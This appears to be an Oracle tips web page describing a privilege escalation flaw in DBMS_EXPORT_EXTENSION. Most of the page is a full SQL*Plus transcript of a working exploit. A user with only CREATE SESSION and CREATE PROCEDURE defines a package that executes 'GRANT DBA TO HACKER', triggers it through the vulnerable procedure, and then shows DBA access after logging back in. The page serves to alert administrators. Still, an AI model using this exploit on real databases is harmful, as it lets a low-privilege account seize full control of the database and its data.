| |
 |
|
Oracle exploit vulnerability allows privilege escalation
Oracle Tips by Mike Ault |
This Oracle privilege vulnerability was
announced to nationwide fanfare, with major alert by Symantec and
CERT, and there has been terror about a
sample attack code release.
This
exploit code was published Wednesday, only a day after Oracle
released its quarterly Critical Patch Update, security provider
Symantec noted.
This vulnerability is only applicable to
internal databases since you must possess a valid Oracle user ID
in-order to perform this exploit. Because you must have an
Oracle ID, this exploit is a not a threat for attacks over the web.
This example of the Oracle exploit also works
in 9iR2, just like 10gR1 and 10gR2, just to demonstrate:
-- Login as SYSTEM
SQL> connect system/password
Connected.
-- now let's create our HACKER user with "minimal privileges"
SQL> create user hacker identified
by hacker;
User created.
SQL> grant create session, create procedure to hacker;
Grant succeeded.
-- Let's connect and do the deed...
SQL> connect hacker/hacker
Connected.
SQL> CREATE OR REPLACE
2 PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
3 IS
4 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
5 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
6 RETURN NUMBER;
7 END;
8 /
Package created.
SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
2 IS
3 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
4 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
5 RETURN NUMBER
6 IS
7 pragma autonomous_transaction;
8 BEGIN
9 EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
10 COMMIT;
11 RETURN(1);
12 END;
13
14 END;
15 /
Package body created.
SQL> DECLARE
2 INDEX_NAME VARCHAR2(200);
3 INDEX_SCHEMA VARCHAR2(200);
4 TYPE_NAME VARCHAR2(200);
5 TYPE_SCHEMA VARCHAR2(200);
6 VERSION VARCHAR2(200);
7 NEWBLOCK PLS_INTEGER;
8 GMFLAGS NUMBER;
9 v_Return VARCHAR2(200);
10 BEGIN
11 INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
12 TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
13 VERSION := '10.2.0.2.0'; GMFLAGS := 1;
14
15 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
16 INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA,
TYPE_NAME
17 => TYPE_NAME,
18 TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
19 NEWBLOCK, GMFLAGS => GMFLAGS
20 );
21 END;
22 /
PL/SQL procedure successfully completed.
--- We don't have it yet, until we re-logon
SQL> select * from v$instance;
select * from v$instance
*
ERROR at line 1:
ORA-00942: table or view does not exist
--now re-logon to acquire grant
SQL> connect hacker/hacker
Connected.
SQL> /
INSTANCE_NUMBER INSTANCE_NAME
--------------- ----------------
HOST_NAME
----------------------------------------------------------------
VERSION STARTUP_T STATUS PAR THREAD# ARCHIVE
LOG_SWITCH_
----------------- --------- ------------ --- ---------- -------
-----------
LOGINS SHU DATABASE_STATUS INSTANCE_ROLE ACTIVE_ST
---------- --- ----------------- ------------------ ---------
1 aultdb2
MRALAPTOP2
9.2.0.5.0 17-APR-06 OPEN NO 1 STARTED
ALLOWED NO ACTIVE PRIMARY_INSTANCE NORMAL
SQL>
Scared yet?
|
and include the URL for the page.
